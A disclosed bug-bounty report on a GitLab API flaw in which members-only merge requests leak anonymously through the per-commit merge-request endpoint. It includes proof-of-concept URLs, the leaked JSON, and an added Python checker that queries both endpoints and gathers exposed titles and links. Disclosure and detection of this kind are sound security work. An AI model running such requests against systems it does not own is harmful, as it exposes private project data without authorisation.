Private MR Disclosed Through Related MR Commit API endpoint
HackerOne report #453400 by ngalog on 2018-12-01:
Summary:
A public project could set MRs to be accessible only by project members (Project Settings -> Permissions).
After setting that permission, non-members will see a 403 when they visit https://{gitlab}/api/v4/projects/{id}/merge_requests
However, when they visit /projects/:id/repository/commits/:sha/merge_requests, the details of the MR are disclosed nonetheless.
Reference: [API](https://docs.gitlab.com/ee/api/commits.html#list-merge-requests-associated-with-a-commit)
Quick PoC on gitlab.com
- Visit https://gitlab.com/api/v4/projects/9696224/merge_requests without any session; you should expect to see a 403. This proves the MRs of this project are confidential, not open to the public.
- Visit https://gitlab.com/api/v4/projects/9696224/repository/commits/f4ec51c29fdbf71c85e14809c21328135ba75c9f/merge_requests without any session; you should see the response below:
[
{
"id": 20154978,
"iid": 3,
"project_id": 9696224,
"title": "Suppose to be privaet merge request",
"description": "privaet MR",
"state": "opened",
"created_at": "2018-11-30T23:47:26.027Z",
"updated_at": "2018-11-30T23:57:11.196Z",
"merged_by": null,
"merged_at": null,
"closed_by": null,
"closed_at": null,
"target_branch": "master",
"source_branch": "mastera",
"upvotes": 0,
"downvotes": 0,
"author": {
"id": 3012741,
"name": "Ashley Johnson",
"username": "ashleyjohnson",
"state": "active",
"avatar_url": "https://secure.gravatar.com/avatar/ee7d3f1eafcb8903d47527c1590722f4?s=80&d=identicon",
"web_url": "https://gitlab.com/ashleyjohnson"
},
"assignee": null,
"source_project_id": 9696224,
"target_project_id": 9696224,
"labels": [],
"work_in_progress": false,
"milestone": null,
"merge_when_pipeline_succeeds": false,
"merge_status": "can_be_merged",
"sha": "f4ec51c29fdbf71c85e14809c21328135ba75c9f",
"merge_commit_sha": null,
"user_notes_count": 0,
"discussion_locked": null,
"should_remove_source_branch": null,
"force_remove_source_branch": false,
"web_url": "https://gitlab.com/new-jjj-groupaaa/newnewthing/merge_requests/3",
"time_stats": {
"time_estimate": 0,
"total_time_spent": 0,
"human_time_estimate": null,
"human_total_time_spent": null
},
"squash": false,
"approvals_before_merge": null
}
]
Impact
MR disclosure
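The two-request comparison in the PoC, turned into a reusable check. This is an added example and not code from the report or from GitLab: it requests the project-level MR listing and the per-commit MR listing anonymously, and flags the inconsistency when the first is refused (401/403) while the second returns MR objects. The `http_get` helper does a real unauthenticated request; the `fake_fetch` responses at the bottom are constructed from the report's text (the 403 body is assumed, not captured) so the check can run offline against the report's project id and commit SHA.

```python
"""Check a GitLab instance for the MR-visibility gap described in the report.

Added example (not the reporter's or GitLab's code). PROJECT_ID and COMMIT_SHA
are the values from the PoC; the offline responses below are constructed.
"""
import json
import urllib.error
import urllib.request

PROJECT_ID = 9696224
COMMIT_SHA = "f4ec51c29fdbf71c85e14809c21328135ba75c9f"


def http_get(url):
    """Anonymous GET (no token, no cookie). Returns (status, body_text)."""
    req = urllib.request.Request(url, headers={"User-Agent": "mr-visibility-check"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 401/403/404 arrive as exceptions; the status code is what we compare.
        return err.code, err.read().decode("utf-8", "replace")


def check_mr_disclosure(base, project_id, sha, fetch=http_get):
    """Compare the two endpoints from the report for one project/commit pair.

    Returns a dict with both status codes, whether MRs are restricted at the
    project level, the MRs (iid/title/web_url) exposed by the per-commit
    endpoint, and a final 'vulnerable' verdict: restricted AND something leaked.
    """
    list_url = f"{base}/api/v4/projects/{project_id}/merge_requests"
    commit_url = (f"{base}/api/v4/projects/{project_id}"
                  f"/repository/commits/{sha}/merge_requests")

    list_status, _ = fetch(list_url)
    commit_status, commit_body = fetch(commit_url)

    result = {
        "list_status": list_status,
        "commit_status": commit_status,
        # 403 is what the report shows; 401 covers instances that demand auth.
        "mrs_restricted": list_status in (401, 403),
        "leaked": [],
    }
    if commit_status == 200:
        try:
            mrs = json.loads(commit_body)
        except ValueError:
            mrs = []
        for mr in mrs if isinstance(mrs, list) else []:
            result["leaked"].append({
                "iid": mr.get("iid"),
                "title": mr.get("title"),
                "web_url": mr.get("web_url"),
            })
    # A 200 on the listing means MRs are public anyway; a 404 on both means the
    # whole project is hidden. Only "listing refused, commit view served" counts.
    result["vulnerable"] = result["mrs_restricted"] and bool(result["leaked"])
    return result


# Constructed offline responses reproducing the report's PoC (not live captures).
_FAKE = {
    f"https://gitlab.com/api/v4/projects/{PROJECT_ID}/merge_requests":
        (403, '{"message":"403 Forbidden"}'),  # body assumed
    f"https://gitlab.com/api/v4/projects/{PROJECT_ID}/repository/commits/{COMMIT_SHA}/merge_requests":
        (200, json.dumps([{
            "id": 20154978, "iid": 3, "project_id": PROJECT_ID,
            "title": "Suppose to be privaet merge request",
            "state": "opened", "sha": COMMIT_SHA,
            "web_url": "https://gitlab.com/new-jjj-groupaaa/newnewthing/merge_requests/3",
        }])),
}


def fake_fetch(url):
    """Stand-in for http_get that serves the constructed responses above."""
    return _FAKE.get(url, (404, '{"message":"404 Not Found"}'))


def fixed_fetch(url):
    """Models a patched instance: both endpoints refuse anonymous callers."""
    return (403, '{"message":"403 Forbidden"}')


if __name__ == "__main__":
    verdict = check_mr_disclosure("https://gitlab.com", PROJECT_ID, COMMIT_SHA, fetch=fake_fetch)
    print(json.dumps(verdict, indent=2))
```

To run it against a real instance, drop the `fetch=` argument so `http_get` is used, and pass a project whose MRs are members-only plus a commit SHA that belongs to one of its MRs; the `fixed_fetch` stand-in shows the expected shape once both endpoints enforce the same permission.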